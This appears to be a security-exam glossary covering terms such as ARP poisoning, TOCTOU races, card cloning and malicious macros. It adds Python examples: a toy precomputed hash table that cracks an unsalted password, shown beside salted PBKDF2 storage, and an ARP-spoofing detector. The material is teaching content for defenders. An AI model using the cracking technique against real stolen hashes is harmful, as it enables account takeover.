Structured Threat Information eXpression. A standardized format for describing cyber threat information, including motivations, abilities, capabilities, and response information. It is exchanged over the Trusted Automated eXchange of Indicator Information (TAXII) transport protocol.
TTP with Threat Research
Tactics, Techniques and Procedures. A type of Threat Research. What are adversaries doing, and how are they doing it? Search through data and networks and look for threats.
Hashing
Takes a password (or any input) and turns it into a fixed-length "fingerprint" (digest). It is one-way: you cannot get the password back from the hash, which is why passwords are stored as hashes instead of plaintext. Password hashes should also be salted and use a slow algorithm.
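The three entries above (Rainbow Tables, Salt, Hashing) describe one mechanism from three angles. The example below is added here and is not code from the original page: it builds a tiny constructed "rainbow table" from a five-word list (a real table holds billions of entries and uses chains to save space, but is used the same way), shows it cracking a bare SHA-256 hash instantly, and then stores the same password with a per-user random salt and PBKDF2, so the table lookup fails and each guess costs the attacker 100,000 hash iterations. The record format and iteration count are assumptions for the example.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000  # PBKDF2 work factor (assumed); raise it as hardware gets faster

# Constructed "rainbow table": a lookup from unsalted SHA-256 digest back to
# the password, precomputed from a tiny wordlist.
WORDLIST = ["password", "123456", "letmein", "doorframe", "dog"]
RAINBOW = {hashlib.sha256(w.encode()).hexdigest(): w for w in WORDLIST}


def unsalted_hash(password):
    """What a naive system stores: a bare, fast hash of the password."""
    return hashlib.sha256(password.encode()).hexdigest()


def crack_with_table(digest_hex):
    """Instant lookup; no hashing is done at attack time."""
    return RAINBOW.get(digest_hex)


def make_record(password):
    """What a sane system stores: algorithm, work factor, per-user random salt,
    and the output of a slow key-derivation function. Two users with the same
    password get different records because their salts differ."""
    salt = os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${key.hex()}"


def check_record(password, record):
    """Re-derive the key with the stored salt and compare in constant time."""
    algo, iters, salt_hex, key_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError(f"unsupported record type {algo!r}")
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(key, bytes.fromhex(key_hex))


if __name__ == "__main__":
    stolen = unsalted_hash("doorframe")
    print("unsalted hash cracked as:", crack_with_table(stolen))
    record = make_record("doorframe")
    print("salted record:", record)
    print("table lookup on salted hash:", crack_with_table(record.split("$")[3]))
    print("login with right password:", check_record("doorframe", record))
```

Storing the iteration count in the record lets you raise the work factor later and re-hash users on their next login. For new systems a memory-hard function (scrypt or Argon2) is preferred over PBKDF2 because it also resists GPU-based cracking.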
Security Teams
Teams may be put together to work and secure a system, involving many different skills (such as operational security, penetration testing, exploit research, etc).
Penetration Testing
Testing whether your security can be penetrated; basically a simulated attack. Similar to vulnerability scanning, but the vulnerabilities are actually exploited. Before starting, agree on the rules of engagement: a document identifying the scope and parameters of the test, the type of test and when it happens, and the rules (what is off limits, who to contact, and how the target should react).
ARP Poisoning
The Address Resolution Protocol (ARP) maps IP addresses to network interfaces (MAC addresses) on the local network, with no authentication. ARP poisoning injects a false IP-to-MAC mapping into the victim's ARP cache, so the victim sends traffic for that IP (typically the default gateway) to the attacker. This can be used to perform a variety of attacks, including DoS, spoofing, and on-path (man in the middle).
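Because ARP replies are unauthenticated, detection relies on noticing contradictions: one IP advertised by two MACs, or one MAC suddenly answering for several IPs (an on-path attacker poisons both the victim and the gateway). The example below is added here and is not code from the original page; the ARP observations and the gateway address 192.168.1.1 are constructed for the example. It runs over the list of replies and returns structured alerts, including a mismatch against an optional static map of trusted addresses.

```python
from collections import defaultdict

# Constructed ARP reply observations (not a real capture):
# (seconds since start, sender IP, sender MAC). 192.168.1.1 is the assumed gateway.
ARP_REPLIES = [
    (0.0, "192.168.1.1", "00:11:22:33:44:01"),
    (0.5, "192.168.1.20", "00:11:22:33:44:20"),
    (1.0, "192.168.1.1", "00:11:22:33:44:01"),
    (2.0, "192.168.1.1", "de:ad:be:ef:00:99"),   # gateway IP now claimed by a new MAC
    (2.1, "192.168.1.1", "de:ad:be:ef:00:99"),
    (2.2, "192.168.1.20", "de:ad:be:ef:00:99"),  # the same MAC also claims the host's IP
]


def detect_arp_spoofing(replies, trusted=None):
    """Return a list of alert dicts from a sequence of (time, ip, mac) replies.

    ip_conflict      one IP advertised by more than one MAC
    mac_multi_ip     one MAC claiming several IPs (poisoning both ends of a path)
    trusted_mismatch an IP in the static `trusted` map seen with another MAC
    """
    trusted = trusted or {}
    ip_to_macs = defaultdict(set)
    mac_to_ips = defaultdict(set)
    alerts = []
    for ts, ip, mac in replies:
        ip_to_macs[ip].add(mac)
        mac_to_ips[mac].add(ip)
        if ip in trusted and mac != trusted[ip]:
            alerts.append({"type": "trusted_mismatch", "time": ts, "ip": ip,
                           "mac": mac, "expected": trusted[ip]})
    for ip, macs in ip_to_macs.items():
        if len(macs) > 1:
            alerts.append({"type": "ip_conflict", "ip": ip, "macs": sorted(macs)})
    for mac, ips in mac_to_ips.items():
        if len(ips) > 1:
            alerts.append({"type": "mac_multi_ip", "mac": mac, "ips": sorted(ips)})
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(ARP_REPLIES, trusted={"192.168.1.1": "00:11:22:33:44:01"}):
        print(alert)
```

Legitimate events also change mappings: DHCP reassignments, VRRP/HSRP gateway failover, and hosts with virtual IPs. In practice you baseline the network or, better, enable DHCP snooping with Dynamic ARP Inspection on the switch so poisoned replies are dropped rather than merely logged.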
The CTA
The Cyber Threat Alliance. A type of Threat Intelligence. This group's members upload specifically formatted threat intelligence. It is scored and validated across other submissions. Members can react faster to threats that are given.
Dumpster Diving
The act of an attacker looking into the trash to possibly find information.
Vulnerability Scanning
The act of scanning for weaknesses and susceptibilities in the network and on individual systems: poking around to see what's open, what versions are running, and what known vulnerabilities match. Unlike a penetration test, it only finds and reports weaknesses; it does not exploit them.
Card Cloning
The unauthorized duplication of a credit card. The copy looks, feels, and works like the original. It works only with magnetic-stripe data; the chip on an EMV card cannot be copied, so cloning targets the stripe.
Threat Actors
The entity responsible for an event that has an impact on the safety of another entity, often called the malicious actor. There is a broad range of these, and their motivations vary as well.
Domain Reputation
The overall "health" of your branded domain as interpreted by mailbox providers. A bad reputation can cause email delivery to fail. This can prevent spam, but may also prevent a business from being visited.
Threat Research
The overall idea of knowing your enemy to prevent an attack.
Watering Hole Attack
An attack in which the attacker compromises a third-party website that the intended victims are known to visit (the "watering hole") and plants malware there. The victims are infected when they visit a site they trust, so the attacker never has to get through the target's own defenses.
Vulnerability Research
The process of analyzing protocols, services, and configurations to discover the vulnerabilities and design flaws that will expose an operating system and its applications to exploit, attack, or misuse. Vulnerabilities can be cross-referenced online. A website like https://nvd.nist.gov/ can be used to do this.
Reconnaissance
The process of observation. You need information before the attack to make it as efficient as possible. Attackers will do this, your job is to prevent it.
Threat Hunting
The process of proactively and iteratively searching through networks to detect and isolate advanced threats that evade existing security solutions.
Vulnerability Impact
The result of a vulnerability being used. Often in the form of the following: -Data loss -Identity theft -Financial loss -Reputation impacts -Availability loss (DoS attacks)
Hash Collision
Two different inputs that produce the same hash value. Attackers find one by brute force: generating many versions of a plaintext (e.g. slight variants of a document) until one matches the hash of the original. Collisions break hashes used for integrity checks and digital signatures; MD5 and SHA-1 have practical known collisions.
Keylogging
The tracking of keystrokes, often done through malware.
Dictionary Attack
The use of a dictionary to find a password from common words. For example, someone could make their password 'doorframe' or even simpler words like 'dog' which can make it easier for the attacker to crack the account.
Macros
This automates functions within an application, making it easier to use. It can also create security vulnerabilities: attackers write malicious macros and only need a user to open the file and agree to enable them. A benign example is a macro that, at the press of a button, sends a sequence of keystrokes with a short delay between each; a malicious one uses the same mechanism to download and run malware.
Memory Leaks
An application allocates memory but fails to release it, so memory use grows the longer it runs. The result is more and more memory used until the system finally crashes or hangs. An attacker who can trigger the leak repeatedly can use it for DoS.
Scripts
This leads to an automation of tasks. This may be used for updates on a computer, or detecting potential problems and solving them before they happen. Attacks can also be automated using these.
TOCTOU Attack
Time-of-check to time-of-use attack. A race condition in which a program checks a condition (for example, whether the user may access a file) and then acts on it a moment later. The attacker changes the state in the window between the check and the use (e.g. swapping the file for a symbolic link), so the action runs on something that was never checked.
Rogue Access Points
Unauthorized access points set up by a department or an individual. May or may not be malicious, but either way it is a significant backdoor into a network.
Spam
Unsolicited messages, often sent through mail, that may contain advertising or even malicious intent.
Tailgating
An unauthorized person follows an authorized person through a secured door, relying on the authorized person's badge and courtesy (holding the door) to get into the building.
Social Engineering
Using social skills to trick people into revealing information; often done under pressure. For example, an email may be told as "urgent" causing someone to act quickly, possibly not thinking in the process.
VBA
Visual Basic for Applications. The macro programming language built into Microsoft Office applications. Malicious Office documents use it to download and run malware once the user enables macros.
Vishing
Voice phishing
Attack Vectors
The paths or methods an attacker uses to reach a target: networks, operating systems, apps, databases, mobile devices, cloud environments, email, removable media, and people. IT professionals spend a lot of their time finding and closing these off.
Evil Twins
Wireless networks that pretend to offer trustworthy Wi-Fi connections to the Internet. It looks legitimate, but it isn't.
Phishing
A malicious person or company "pretending" to be someone they aren't, usually by email, to trick the victim into giving up credentials or opening malicious content. For example, an attacker may disguise an email full of malicious links as an Amazon email.
Supply Chain
The connected chain of all the business entities that create, build and deliver a product. One compromise anywhere in the chain can affect every customer downstream.